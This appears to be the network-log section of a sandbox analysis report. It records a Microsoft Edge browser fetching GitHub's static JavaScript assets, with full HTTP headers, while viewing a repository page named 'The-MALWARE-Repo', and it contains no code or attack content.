
Remote address:

185.199.108.154:443

Request

GET /assets/vendors-node_modules_github_selector-observer_dist_index_esm_js-f690fd9ae3d5.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Thu, 08 Aug 2024 18:12:13 GMT
etag: "0x8DCB7D5A12F8D41"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Wed, 12 Mar 2025 02:35:04 GMT
age: 2409482
x-served-by: cache-iad-kiad7000168-IAD, cache-lon420133-LON
x-cache: HIT, HIT
x-cache-hits: 23430, 15001
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 5cbf6edc609e93356f1f54fb71b69ed9bd29753c
content-length: 3284
GET

https://github.githubassets.com/assets/vendors-node_modules_github_relative-time-element_dist_index_js-f6da4b3fa34c.js

msedge.exe

Remote address:

185.199.108.154:443

Request

GET /assets/vendors-node_modules_github_relative-time-element_dist_index_js-f6da4b3fa34c.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Tue, 12 Nov 2024 00:52:41 GMT
etag: "0x8DD02B4500C5DFD"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Wed, 12 Mar 2025 02:35:04 GMT
age: 2254225
x-served-by: cache-iad-kiad7000164-IAD, cache-lon420133-LON
x-cache: HIT, HIT
x-cache-hits: 85, 15064
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 3c2119fcb84db246bb16f314e79d0df96051f6b3
content-length: 4311
GET

https://github.githubassets.com/assets/vendors-node_modules_github_text-expander-element_dist_index_js-78748950cb0c.js

msedge.exe

Remote address:

185.199.108.154:443

Request

GET /assets/vendors-node_modules_github_text-expander-element_dist_index_js-78748950cb0c.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Mon, 09 Dec 2024 18:22:05 GMT
etag: "0x8DD187E625ACB6B"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Wed, 12 Mar 2025 02:35:04 GMT
age: 1450383
x-served-by: cache-iad-kiad7000085-IAD, cache-lon420133-LON
x-cache: HIT, HIT
x-cache-hits: 3682, 15058
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 20141318dd41f6d1bc4a285ae04cf6f8d2a00e92
content-length: 4645
GET

https://github.githubassets.com/assets/vendors-node_modules_github_auto-complete-element_dist_index_js-node_modules_github_catalyst_-8e9f78-a74b4e0a8a6b.js

msedge.exe

Remote address:

185.199.108.154:443

Request

GET /assets/vendors-node_modules_github_auto-complete-element_dist_index_js-node_modules_github_catalyst_-8e9f78-a74b4e0a8a6b.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Mon, 25 Nov 2024 14:39:52 GMT
etag: "0x8DD0D5F05CBAB3B"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Wed, 12 Mar 2025 02:35:04 GMT
age: 3523275
x-served-by: cache-iad-kiad7000130-IAD, cache-lon420133-LON
x-cache: HIT, HIT
x-cache-hits: 12551, 15118
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 0e53d0e564a9b616353f344d9aff46b84882769f
content-length: 6786
GET

https://github.githubassets.com/assets/vendors-node_modules_github_filter-input-element_dist_index_js-node_modules_github_remote-inp-b5f1d7-a1760ffda83d.js

msedge.exe

Remote address:

185.199.108.154:443

Request

GET /assets/vendors-node_modules_github_filter-input-element_dist_index_js-node_modules_github_remote-inp-b5f1d7-a1760ffda83d.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Mon, 25 Nov 2024 15:32:27 GMT
etag: "0x8DD0D665E0F9ED8"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Wed, 12 Mar 2025 02:35:04 GMT
age: 3703831
x-served-by: cache-iad-kcgs7200078-IAD, cache-lon420133-LON
x-cache: HIT, HIT
x-cache-hits: 49224, 15100
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 9d68e6ef5205ea7e7ab97d9e8eb176fa0100c205
content-length: 5379
GET

https://github.githubassets.com/assets/vendors-node_modules_github_markdown-toolbar-element_dist_index_js-ceef33f593fa.js

msedge.exe

Remote address:

185.199.108.154:443

Request

GET /assets/vendors-node_modules_github_markdown-toolbar-element_dist_index_js-ceef33f593fa.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Tue, 10 Dec 2024 19:56:20 GMT
etag: "0x8DD1954B7817C15"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Wed, 12 Mar 2025 02:35:04 GMT
age: 1187203
x-served-by: cache-iad-kjyo7100066-IAD, cache-lon420133-LON
x-cache: HIT, HIT
x-cache-hits: 21, 15101
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: b7ffc3d3b84c5424dec270fbf7ed3c86205f2961
content-length: 3683
GET

https://github.githubassets.com/assets/vendors-node_modules_github_file-attachment-element_dist_index_js-node_modules_primer_view-co-c44a69-8094ee2ecc5e.js

msedge.exe

Remote address:

185.199.108.154:443

Request

GET /assets/vendors-node_modules_github_file-attachment-element_dist_index_js-node_modules_primer_view-co-c44a69-8094ee2ecc5e.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Fri, 28 Feb 2025 17:13:43 GMT
etag: "0x8DD581B4155B409"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Wed, 12 Mar 2025 02:35:04 GMT
age: 440176
x-served-by: cache-iad-kjyo7100061-IAD, cache-lon420133-LON
x-cache: HIT, HIT
x-cache-hits: 58, 7202
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: ac235a9c2c2383077f030c5226229777b9ef1a55
content-length: 9669
GET

https://github.githubassets.com/assets/github-elements-e73c59eabd5a.js

msedge.exe

Remote address:

185.199.108.154:443

Request

GET /assets/github-elements-e73c59eabd5a.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Fri, 14 Feb 2025 00:11:27 GMT
etag: "0x8DD4C8C201FE2F3"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Wed, 12 Mar 2025 02:35:04 GMT
age: 1176246
x-served-by: cache-iad-kcgs7200142-IAD, cache-lon420133-LON
x-cache: HIT, HIT
x-cache-hits: 400, 16225
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 6472df60e373d7ffda1e77c754073492038cf6d4
content-length: 27642
GET

https://github.githubassets.com/assets/element-registry-0339e35021ae.js

msedge.exe

Remote address:

185.199.108.154:443

Request

GET /assets/element-registry-0339e35021ae.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Mon, 10 Mar 2025 21:10:16 GMT
etag: "0x8DD6017F4CD3895"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Wed, 12 Mar 2025 02:35:04 GMT
age: 35157
x-served-by: cache-iad-kcgs7200065-IAD, cache-lon420133-LON
x-cache: HIT, HIT
x-cache-hits: 39, 794
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 1f9ee9de8a1c95a92f7cfe8567f1491c97defbbd
content-length: 8101
GET

https://github.githubassets.com/assets/vendors-node_modules_braintree_browser-detection_dist_browser-detection_js-node_modules_githu-bb80ec-72267f4e3ff9.js

msedge.exe

Remote address:

185.199.108.154:443

Request

GET /assets/vendors-node_modules_braintree_browser-detection_dist_browser-detection_js-node_modules_githu-bb80ec-72267f4e3ff9.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Wed, 15 Jan 2025 21:47:51 GMT
etag: "0x8DD35AE42915564"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Wed, 12 Mar 2025 02:35:04 GMT
age: 3691817
x-served-by: cache-iad-kcgs7200062-IAD, cache-lon420133-LON
x-cache: HIT, HIT
x-cache-hits: 4, 15591
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: fc779a12b37c9b61fedb1dbd31d8702721c0d95f
content-length: 4972
GET

https://github.githubassets.com/assets/vendors-node_modules_lit-html_lit-html_js-be8cb88f481b.js

msedge.exe

Remote address:

185.199.108.154:443

Request

GET /assets/vendors-node_modules_lit-html_lit-html_js-be8cb88f481b.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Tue, 12 Nov 2024 00:52:41 GMT
etag: "0x8DD02B4500E579D"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Wed, 12 Mar 2025 02:35:04 GMT
age: 3679265
x-served-by: cache-iad-kjyo7100066-IAD, cache-lon420133-LON
x-cache: HIT, HIT
x-cache-hits: 1658, 15123
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 06640271503bf93cc3c6a4c74c153acf4b8b3f6a
content-length: 3918
GET

https://github.githubassets.com/assets/vendors-node_modules_github_mini-throttle_dist_index_js-node_modules_morphdom_dist_morphdom-e-7c534c-a4a1922eb55f.js

msedge.exe

Remote address:

185.199.108.154:443

Request

GET /assets/vendors-node_modules_github_mini-throttle_dist_index_js-node_modules_morphdom_dist_morphdom-e-7c534c-a4a1922eb55f.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Thu, 08 Aug 2024 18:12:13 GMT
etag: "0x8DCB7D5A12F3F7D"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Wed, 12 Mar 2025 02:35:04 GMT
age: 4274521
x-served-by: cache-iad-kcgs7200153-IAD, cache-lon420133-LON
x-cache: HIT, HIT
x-cache-hits: 14906, 15115
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 51304dc80915c68daa2d02d4a0742687c1675c43
content-length: 3816
GET

https://github.githubassets.com/assets/vendors-node_modules_github_turbo_dist_turbo_es2017-esm_js-e3cbe28f1638.js

msedge.exe

Remote address:

185.199.108.154:443

Request

GET /assets/vendors-node_modules_github_turbo_dist_turbo_es2017-esm_js-e3cbe28f1638.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Thu, 05 Dec 2024 15:49:17 GMT
etag: "0x8DD15446030C279"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Wed, 12 Mar 2025 02:35:04 GMT
age: 4880325
x-served-by: cache-iad-kiad7000040-IAD, cache-lon420133-LON
x-cache: HIT, HIT
x-cache-hits: 39590, 15429
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: ffc4796249ced943e8001226ab97942c4d0e24fe
content-length: 18635
GET

https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_delegated-events_dist_inde-893f9f-6cf3320416b8.js

msedge.exe

Remote address:

185.199.108.154:443

Request

GET /assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_delegated-events_dist_inde-893f9f-6cf3320416b8.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Tue, 12 Nov 2024 00:52:41 GMT
etag: "0x8DD02B44FAF168F"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Wed, 12 Mar 2025 02:35:04 GMT
age: 1452754
x-served-by: cache-iad-kiad7000037-IAD, cache-lon420133-LON
x-cache: HIT, HIT
x-cache-hits: 48, 15132
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: fb026d70fc5fd2205327026515d27ea06b246bdc
content-length: 2385
GET

https://github.githubassets.com/assets/vendors-node_modules_color-convert_index_js-e3180fe3bcb3.js

msedge.exe

Remote address:

185.199.108.154:443

Request

GET /assets/vendors-node_modules_color-convert_index_js-e3180fe3bcb3.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Tue, 12 Nov 2024 00:52:40 GMT
etag: "0x8DD02B44F3EF886"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Wed, 12 Mar 2025 02:35:04 GMT
age: 1514421
x-served-by: cache-iad-kcgs7200145-IAD, cache-lon420133-LON
x-cache: HIT, HIT
x-cache-hits: 4909, 15153
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 16ace9e1413305b6c499a907a5d79b5f916569a1
content-length: 4851
GET

https://github.githubassets.com/assets/vendors-node_modules_github_quote-selection_dist_index_js-node_modules_github_session-resume_-69cfcc-bc42a18e77d5.js

msedge.exe

Remote address:

185.199.108.154:443

Request

GET /assets/vendors-node_modules_github_quote-selection_dist_index_js-node_modules_github_session-resume_-69cfcc-bc42a18e77d5.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Fri, 21 Feb 2025 16:07:44 GMT
etag: "0x8DD5291E04DD7EB"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Wed, 12 Mar 2025 02:35:04 GMT
age: 1585027
x-served-by: cache-iad-kjyo7100022-IAD, cache-lon420133-LON
x-cache: HIT, HIT
x-cache-hits: 68, 16314
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 27b083a181f0477b7021b0c3fa2c400fb75bc792
content-length: 19244
GET

https://github.githubassets.com/assets/ui_packages_updatable-content_updatable-content_ts-2a55124d5c52.js

msedge.exe

Remote address:

185.199.108.154:443

Request

GET /assets/ui_packages_updatable-content_updatable-content_ts-2a55124d5c52.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Wed, 05 Mar 2025 20:20:04 GMT
etag: "0x8DD5C231DC98B21"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Wed, 12 Mar 2025 02:35:04 GMT
age: 521240
x-served-by: cache-iad-kjyo7100096-IAD, cache-lon420133-LON
x-cache: HIT, HIT
x-cache-hits: 133, 8624
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: d08cfec15df57206138ff2d22182749ce6b39aae
content-length: 3409
GET

https://github.githubassets.com/assets/app_assets_modules_github_behaviors_task-list_ts-app_assets_modules_github_sso_ts-ui_packages-900dde-768abe60b1f8.js

msedge.exe

Remote address:

185.199.108.154:443

Request

GET /assets/app_assets_modules_github_behaviors_task-list_ts-app_assets_modules_github_sso_ts-ui_packages-900dde-768abe60b1f8.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Tue, 19 Nov 2024 17:47:26 GMT
etag: "0x8DD08C23B22EDF8"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Wed, 12 Mar 2025 02:35:04 GMT
age: 4283290
x-served-by: cache-iad-kiad7000141-IAD, cache-lon420133-LON
x-cache: HIT, HIT
x-cache-hits: 72, 15113
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: a2355f56e2e21829a0f58f4e5b5ec0aeaff316f1
content-length: 4143
GET

https://github.githubassets.com/assets/app_assets_modules_github_sticky-scroll-into-view_ts-3e000c5d31a9.js

msedge.exe

Remote address:

185.199.108.154:443

Request

GET /assets/app_assets_modules_github_sticky-scroll-into-view_ts-3e000c5d31a9.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Mon, 24 Feb 2025 18:43:33 GMT
etag: "0x8DD55032404E23B"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Wed, 12 Mar 2025 02:35:04 GMT
age: 1297404
x-served-by: cache-iad-kiad7000020-IAD, cache-lon420133-LON
x-cache: HIT, HIT
x-cache-hits: 153, 16709
vary: Accept-Encoding
